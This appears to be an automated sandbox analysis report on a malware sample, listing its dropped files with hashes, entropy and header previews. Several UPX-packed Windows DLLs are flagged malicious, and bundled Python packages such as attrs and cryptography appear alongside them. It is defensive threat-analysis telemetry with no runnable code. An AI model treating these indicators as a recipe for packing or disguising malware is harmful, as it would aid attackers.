                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22480
                                                                                                                                                                                                                                  Entropy (8bit):7.32762432693115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:qNfkKehcfqssUE2Za7gJXdFIp7UYNNIYiSy1pCQjSdhiV:qNn0cfqsrJpNFIp7UY8YiSyv2dhiV
                                                                                                                                                                                                                                  MD5:882E18BA4EDBA5C3343EAF69DE9EF0D2
                                                                                                                                                                                                                                  SHA1:42D979B4367401A8DA471938E51D9D8B8F21FBDB
                                                                                                                                                                                                                                  SHA-256:35B72EF1546F5C99EC7655439D946D21049C1AF1A8B04D43DD75905D07BD3D9C
                                                                                                                                                                                                                                  SHA-512:A005717F087F0650C1F8F7F446E8CBD6C89A4FFE486957EAC62ABB649AC52767A27506A02FED4A039C7347E24D1D13B02883432F7D00EED92BE50B36DBA11ED6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a.B...B...B...K..@.......@.......I.......J.......A.......A......@...B...........C.......C.......C.......C...RichB...........PE..d.....1b.........." .....0...............................................................`.............................................L.......P............`..............<..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39888
                                                                                                                                                                                                                                  Entropy (8bit):7.682490136457935
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:XKMuI8GcMqxhB9PkZIgRi2zo4lLuACzpTbcIpQwVm2YiSyvqWhP:X9uFNhBqZnRKbcIpQwVm27Syii
                                                                                                                                                                                                                                  MD5:C393807C2B4DB1EF035C35D44EE7E27E
                                                                                                                                                                                                                                  SHA1:2035AE4199CB87F87C21A170DFF6094CCCAC789E
                                                                                                                                                                                                                                  SHA-256:F9F87F9E233A83F00B59E4B20C3EF5CDC4C8256F1FBF8D6CBC3A8619A5D31161
                                                                                                                                                                                                                                  SHA-512:DF30349A031D47BCD2A2324067364FC04C57EC55C3014BEEEC325CF3F19B88AC36A1C120B9B3833011F7DEA3A7A8461E8ED847E104CFA786DF1FF0404C324394
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w...............nk......c.......c.......c.......c......[c..........P...5d......[c......[c......[c......[c......Rich............................PE..d.....1b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47056
                                                                                                                                                                                                                                  Entropy (8bit):7.755609199812785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:eTHRwxvGd4bDKsjiGlJhBdlL8gnLQbRiUqKOfBpD8Ip5QVR6YiSyvMhp:eb+vGdcrlbnRwatX8Ip5QVY7Sy2
                                                                                                                                                                                                                                  MD5:66BDD61D103F7408B39ED0689A736FCF
                                                                                                                                                                                                                                  SHA1:BF64187823AF7E17DF7FFB6D022D6C55529B5019
                                                                                                                                                                                                                                  SHA-256:457C828ED5DC483D90525AEC78DCF58A63AC59B1E985192FA812884EF6DA85D2
                                                                                                                                                                                                                                  SHA-512:5DAE18D8AD419C582C6A362F076519C52286DA89B98BE296BCF1A1AF46706790D479FA76D72F0760F349B4941B1811BDC5CBC3C6BFFAFEC190D28F97442E989F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.V7r.8dr.8dr.8d{..dt.8d .9ep.8d...ds.8d .=e~.8d .<ez.8d .;eq.8d.9ew.8d..9ep.8dr.9d..8d.5e{.8d.8es.8d..ds.8d.:es.8dRichr.8d........PE..d.....1b.........." .............0......@................................................`.............................................P.......4............P..............(...........................................8...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59856
                                                                                                                                                                                                                                  Entropy (8bit):7.828527450126354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yd+C+aTcxwivPlbXhef/os1VtReWIpt7ep57Syyv:z1aAxwivPlLsHtRnIpt7ezI
                                                                                                                                                                                                                                  MD5:42146DB5647F8A00358473ACEE48FDDC
                                                                                                                                                                                                                                  SHA1:BE45224DB1ED10E238EAE50D1B4F9D3FEF40C698
                                                                                                                                                                                                                                  SHA-256:7B2D9490DFECFAF918D3EEB5D8F242EFF1C3DE6609D414BB3C318859D2A6717C
                                                                                                                                                                                                                                  SHA-512:1E522B661BD20F8F878E6F2E2F9BF6868048DC752D596162A3BA1C6283A76EC60F3F1CD792E1E670FCD5A9AB57CFCF9D5F11B257F44E68F9DC42DF81B6C2A60D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.D. .*. .*. .*.)..&.*.r.+.".*.r./.,.*.r...(.*.r.).#.*...+.".*...+.$.*. .+...*...+.'.*...'.".*...*.!.*.....!.*...(.!.*.Rich .*.........................PE..d.....1b.........." ................P.....................................................`.........................................p...d....................P......................................................`...8...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19920
                                                                                                                                                                                                                                  Entropy (8bit):7.223583800281879
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:C2FZmc4Pqgg/uEZa7gJXbEIpew4YbIYiSy1pCQHq+Ahsvk:C2FZmcZ2EpLEIpew4xYiSyvehOk
                                                                                                                                                                                                                                  MD5:7C7DB8C81F5F26CF1A795254F4CFBA81
                                                                                                                                                                                                                                  SHA1:0575708630B0F8917E80285D065DCF27F5642307
                                                                                                                                                                                                                                  SHA-256:E23FD6254ACEB83C12BDAAA477B3777CC84FFD057DCD86DE5BA15BBB94D3B321
                                                                                                                                                                                                                                  SHA-512:C7481F6A7EA6EB343A5A1F98E8040C8018A26B32B5C08B0C11D00E68E0C77F800421D147998B24E24821913D274B3DFF36B14A2140FB3DEB4649CBB50BC3A561
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&4F.bU(.bU(.bU(.k-..`U(.0 ).`U(.0 -.iU(.0 ,.jU(.0 +.aU(.. ).`U(..').gU(.bU).KU(.. .cU(.. (.cU(.. ..cU(.. *.cU(.RichbU(.........................PE..d.....1b.........." ..... .......`..@....p................................................`.........................................8...L....................@......................................................@...8...........................................UPX0.....`..............................UPX1..... ...p......................@....rsrc................"..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26112
                                                                                                                                                                                                                                  Entropy (8bit):7.667688394147415
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:hAgts4wZXjNKzfSpVzDaDywUIHruBnZxpPI:hxtJijNppVdIL69I
                                                                                                                                                                                                                                  MD5:785031E18BB4C52889CB92A1B43AF777
                                                                                                                                                                                                                                  SHA1:FAB7EE02BD57218EF6043455C3C275AFA99B981F
                                                                                                                                                                                                                                  SHA-256:E3A028C10A2DBB4E9A8E04D35637D1E2AA7639C73FF9650F3218BE455442B7DC
                                                                                                                                                                                                                                  SHA-512:525D0A8FC4074AE3F5C50E78445528FE90419AF5CDCB7579F5D556F3616BBD9F632B184E3400E1CFF551C7DC646C5E38C44B5575B323910264B83B4395906AE0
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........oB[..,...,...,..v....,...-...,..v-...,.../...,...(...,...)...,.f{-...,...-...,..$...,..,...,......,......,.Rich..,.........................PE..d....A.g.........." ...).`..........0?.......................................`............`.........................................@R..`....P..P....P.......................R......................................0K..@...........................................UPX0....................................UPX1.....`.......^..................@....rsrc........P.......b..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):82944
                                                                                                                                                                                                                                  Entropy (8bit):7.949330226659946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:pDJzqoj6kwZ0YWPXwlnsYUdjecK7UBopf3YcjRNt3WMdaTtalbgEM9xI:pDYoj6k/YKgtsYuw7UB4YQRpa
                                                                                                                                                                                                                                  MD5:70E66A7159A10AD5673E5D91CB5B7C55
                                                                                                                                                                                                                                  SHA1:158497A3D11A410F277E813A55EE1B64936D95C2
                                                                                                                                                                                                                                  SHA-256:60CEEB87549DC017BD151AE1B840E08386F3B9A65079356D108C85295C578510
                                                                                                                                                                                                                                  SHA-512:518D094EE366A54652ED001BD832D95365A99BE30E3CCD45F2B19CE8611D4FCC8911172CCFAC714496E2B553813F49E85CDDA6C094E2E42BB96C078B3F072421
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...WR..WR..WR...R..WR.kVS..WR.VS..WRj.VS..WR..VRF.WR.kTS..WR.kSS..WR.kRS..WR.j_S..WR.jWS..WR.j.R..WR.jUS..WRRich..WR........................PE..d....A.g.........." ...).@.......p.. .....................................................`..................................................................@..............\....................................... ...@...........................................UPX0.....p..............................UPX1.....@.......8..................@....rsrc................<..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25088
                                                                                                                                                                                                                                  Entropy (8bit):7.713045391985211
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Qgf7VnuWhwjmpHKTjQ6j0+l123fPA/1pv:Qgf7VnWUHKTjjmvI/f
                                                                                                                                                                                                                                  MD5:633E3269E2C42EC6A4518864E799300B
                                                                                                                                                                                                                                  SHA1:4ABC0D717F537980EFCBC5C847E0F00FF2727DFB
                                                                                                                                                                                                                                  SHA-256:7F33F7E480270DF70363A8510EA2C68BC8D9D0B34D46F73759A7833B89DF3129
                                                                                                                                                                                                                                  SHA-512:983C6EAA301876BE356C15FA28E01815F75E8086D25C9A8DB9110523217BCAB58FFCBE28D24FD31FD3AC6B142862A9C6314427A58E96968E0C050BD84B46568C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?..............v..............................b{..........4................S...........Rich....................PE..d....A.g.........." ...).`...........l... ................................................`.........................................@...h.......P............ ..0....................................................x..@...........................................UPX0....................................UPX1.....`... ...Z..................@....rsrc................^..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                  Entropy (8bit):7.53910407738473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:a7Zn4Hp1CV3K/CqTERpJz08tWrPPB20Za7gJXfB:a7F0X/CqTCJzQpv
                                                                                                                                                                                                                                  MD5:E64158AE2CF875156756F22CCD54B292
                                                                                                                                                                                                                                  SHA1:346B3EBD5E7F270DDDB1CAE228FE56145F096193
                                                                                                                                                                                                                                  SHA-256:2F1D5C8EAC0B485E38D8AFEFEB759586666ECE4E963AF9ADCF0F1ABFE99C56CE
                                                                                                                                                                                                                                  SHA-512:4A09D91700C7175D05DFA00DC81A99482AE2BFC80C60514CA33F6BD31998BA6EB8FA04C5EA1DAE877E248DF38A050B3D23A560A9A078747DC1D3EF06DA13A8B5
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........oB[..,...,...,..v....,...-...,..v-...,.../...,...(...,...)...,.f{-...,...-.%.,..$...,..,...,......,......,.Rich..,.........................PE..d....A.g.........." ...).P..........p.....................................................`.........................................@...d.......P...............4...................................................p...@...........................................UPX0....................................UPX1.....P.......H..................@....rsrc................L..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:pip.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (411)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11524
                                                                                                                                                                                                                                  Entropy (8bit):5.211520136058075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ERsUfi6bkQk+k/kKkegToJWicnJsPVA1oz2dv7COmoKTACoEJdQ/0G6lWg+JdQV5:ERsXpLs3VoJWRnJsPvz2dDCHoKsLgA6z
                                                                                                                                                                                                                                  MD5:49CABCB5F8DA14C72C8C3D00ADB3C115
                                                                                                                                                                                                                                  SHA1:F575BECF993ECDF9C6E43190C1CB74D3556CF912
                                                                                                                                                                                                                                  SHA-256:DC9824E25AFD635480A8073038B3CDFE6A56D3073A54E1A6FB21EDD4BB0F207C
                                                                                                                                                                                                                                  SHA-512:923DAEEE0861611D230DF263577B3C382AE26400CA5F1830EE309BD6737EED2AD934010D61CDD4796618BEDB3436CD772D9429A5BED0A106EF7DE60E114E505C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Metadata-Version: 2.3.Name: attrs.Version: 24.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3556
                                                                                                                                                                                                                                  Entropy (8bit):5.814247636010401
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Q9ewplxJT/oPynEddwBbCobXm9qGmR5VXzskcGD+qLtxO:2ewXdJCKXGeR/XzKiO
                                                                                                                                                                                                                                  MD5:48C3E62C23B44C5C1B03F2634154C391
                                                                                                                                                                                                                                  SHA1:7E674C4D1EC604BB62103DBEEB008350FF159EE7
                                                                                                                                                                                                                                  SHA-256:0B638F04D30B4FF714170AC499F89142868A36760532ED20017263E9CC85136C
                                                                                                                                                                                                                                  SHA-512:99B720AF1775F6A264C28817E44112CD6422E8716E62221946629D08FA1EC06FFB4E9076E55429CB19A9F07C7E95B2BDC01C6523178E7DFB824841C954ED0C16
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:attr/__init__.py,sha256=l8Ewh5KZE7CCY0i1iDfSCnFiUTIkBVoqsXjX9EZnIVA,2087..attr/__init__.pyi,sha256=aTVHBPX6krCGvbQvOl_UKqEzmi2HFsaIVm2WKmAiqVs,11434..attr/__pycache__/__init__.cpython-310.pyc,,..attr/__pycache__/_cmp.cpython-310.pyc,,..attr/__pycache__/_compat.cpython-310.pyc,,..attr/__pycache__/_config.cpython-310.pyc,,..attr/__pycache__/_funcs.cpython-310.pyc,,..attr/__pycache__/_make.cpython-310.pyc,,..attr/__pycache__/_next_gen.cpython-310.pyc,,..attr/__pycache__/_version_info.cpython-310.pyc,,..attr/__pycache__/converters.cpython-310.pyc,,..attr/__pycache__/exceptions.cpython-310.pyc,,..attr/__pycache__/filters.cpython-310.pyc,,..attr/__pycache__/setters.cpython-310.pyc,,..attr/__pycache__/validators.cpython-310.pyc,,..attr/_cmp.py,sha256=3umHiBtgsEYtvNP_8XrQwTCdFoZIX4DEur76N-2a3X8,4123..attr/_cmp.pyi,sha256=U-_RU_UZOyPUEQzXE6RMYQQcjkZRY25wTH99sN0s7MM,368..attr/_compat.py,sha256=n2Uk3c-ywv0PkFfGlvqR7SzDXp4NOhWmNV_ZK6YfWoM,2958..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP
Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):87
Entropy (8bit):4.730668933656452
Encrypted:false
SSDEEP:3:RtEeXAaCTQnP+tPCCfA5I:Rt2PcnWBB3
MD5:52ADFA0C417902EE8F0C3D1CA2372AC3
SHA1:B67635615EEF7E869D74F4813B5DC576104825DD
SHA-256:D7215D7625CC9AF60AED0613AAD44DB57EBA589D0CCFC3D8122114A0E514C516
SHA-512:BFA87E7B0E76E544C2108EF40B9FAC8C5FF4327AB8EDE9FEB2891BD5D38FEA117BD9EEBAF62F6C357B4DEADDAD5A5220E0B4A54078C8C2DE34CB1DD5E00F2D62
Malicious:false
Preview:Wheel-Version: 1.0.Generator: hatchling 1.25.0.Root-Is-Purelib: true.Tag: py3-none-any.

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):1109
Entropy (8bit):5.104415762129373
Encrypted:false
SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
MD5:5E55731824CF9205CFABEAB9A0600887
SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
Malicious:false
Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):879571
Entropy (8bit):5.683031691221868
Encrypted:false
SSDEEP:12288:EEHYKmIpWyxC6SacpFnA4a2YK6dnVw9sfJEZFT3ESLMNOI:EEHYoVxoLa2xsVw9sfJEZFTfMNOI
MD5:789D288A8A4BD999B71846B020BB425C
SHA1:A4A4C52092FF8CFAA10E05FAB0C879009BD0395E
SHA-256:215E363D87855BF45206A8F8B5510227930422829842E7F0A41FDD0BF7CB5CDC
SHA-512:95AB7D80B37059AD6AA19B66568E1240A5825D770300846A635BD57B2579B06413A370DB2053445973F36EF8DCD4BFE8E2E52FBD65A8DB59B48641854C49FF65
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
SSDEEP:3:Mn:M
MD5:365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:false
Preview:pip.

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):5440
Entropy (8bit):5.074230645519915
Encrypted:false
SSDEEP:96:DloQIUQIhQIKQILbQIRIaMPktjaVxsxA2TLLDmplH7dwnqTIvrUmA0JQTQCQx5KN:RcPuP1srTLLDmplH7JTIvYX0JQTQ9x54
MD5:C891CD93024AF027647E6DE89D0FFCE2
SHA1:01D8D6F93F1B922A91C82D4711BCEFB885AD47B0
SHA-256:EB36E0E4251E8479EF36964440755EF22BEDD411BA87A93F726FA8E5BB0E64B0
SHA-512:3386FBB3DCF7383B2D427093624C531C50BE34E3E0AA0984547B953E04776D0D431D5267827F4194A9B0AD1AB897869115623E802A6A1C5D2AE1AD82C96CCE71
Malicious:false
Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.3.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:CSV text
Category:dropped
Size (bytes):15579
Entropy (8bit):5.5688027252302765
Encrypted:false
SSDEEP:192:1XeTBL7z5jF4E1tkhX/v4WP36W1HepPN+NX6in5Hqw/S+B:1XkL7hCEu/9P36W1HepPN+96inb7B
MD5:1AB7043795D11BF1FCCDB46501629B3F
SHA1:C9CCD2EFF4FF90B93A0FB80352D80350FC66ACED
SHA-256:81A4E29487987C33E3117D56A58EF4EDED4896B529F40BAF94DCC33297072D7A
SHA-512:BED341B83EBFE7BF68EDE972B0055C094203D7BFAEE66579BFE107B61E757907F49812D7B5A3525341960ADDE4F7555EC76AFF83E3DED67CCE1161789465E413
Malicious:false

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):94
Entropy (8bit):5.016084900984752
Encrypted:false
SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
MD5:C869D30012A100ADEB75860F3810C8C9
SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
Malicious:false
Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):197
Entropy (8bit):4.61968998873571
Encrypted:false
SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:false
Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:ASCII text
Category:dropped
Size (bytes):11360
Entropy (8bit):4.426756947907149
Encrypted:false
